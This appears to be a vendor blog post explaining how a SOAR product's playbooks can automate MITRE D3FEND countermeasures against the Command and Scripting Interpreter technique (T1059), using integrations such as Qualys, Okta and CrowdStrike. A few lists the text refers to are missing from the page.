Command and Scripting Interpreter attacks were the second most common technique seen in MITRE’s Engenuity’s Sightings Ecosystem report, representing 15.77% of 1.1 million sightings. MITRE’s D3FEND matrix outlines how to address this technique however security teams struggle to consistently implement D3FEND’s recommendations.
This blog demonstrates how Security Orchestration, Automation, and Response (SOAR) can be used to consistently implement each stage of the D3FEND framework.
The Command and Scripting Interpreter technique (ATT&CK ID T1059) refers to the exploitation of command-line interpreters to execute malicious commands on a targeted system. Interfaces, such as PowerShell, Bash, or Windows Command Prompt, provide a direct means to interact with the underlying system, allowing users to execute commands and scripts to perform legitimate administrative tasks. These interpreters are far-reaching and common across many devices, making them attractive targets.
The MITRE D3FEND Matrix has six stages: model, harden, detect, isolate, deceive, and evict. Each has different tasks that can be completed to address T1059. In the examples below, I will show you how Smart SOAR playbooks can turn D3FEND’s recommendations into automated workflows.
D3FEND Recommendation: Asset Vulnerability Enumeration. In stage one, MITRE recommends running vulnerability scans on affected devices. This is possible in Smart SOAR using one of our many integrations. For example, Qualys Vulnerability Management can be used to:
D3FEND Recommendation: Local File Permissions. If a compromised account has been confirmed, permission restriction is the next stage of the D3FEND framework. An identity and access management tool can be used to view user permissions, available groups, and limit access to files, applications, or devices. In this example we use Okta to execute these tasks.
In stage three, MITRE recommends conducting a detailed file analysis including dynamic, emulated, and file analysis. Many security tools have this capability. For example, CrowdStrike can be used to submit files to a sandbox environment and review the results of the report directly within Smart SOAR. The commands include:
D3FEND Recommendation: Executable Allow/Denylisting. If a malicious file is found to be running on a device, then the next action a security team needs to take is to add the process it’s executing to the denylist. Conversely, if the executables are found to be benign, and triggered from a false positive, they can be added to an allowlist to eliminate future false positives.
D3FEND Recommendation: Decoy File. Playbooks can create new files and add the hashes to an EDR’s watchlist to monitor the file and detect suspicious activity. This is a way for security teams to trick an adversary, monitoring their actions, and ultimately removing them from the network.
D3FEND Recommendation: File Removal. The final stage of the D3FEND framework is Eviction. For Command and Scripting Interpreter threats, this means removing malicious files from the network. CrowdStrike’s Delete IOCs command is one example of an integration command that can be used to remove the file from affected devices.
MITRE D3FEND is a reliable framework; however, it’s difficult to implement consistently because of its detailed nature. Without an automated workflow, it’s easy for teams to miss crucial steps in the incident response process. By building playbooks inside of Smart SOAR that are directly in line with MITRE D3FEND best practices, security teams can follow the right process, everytime.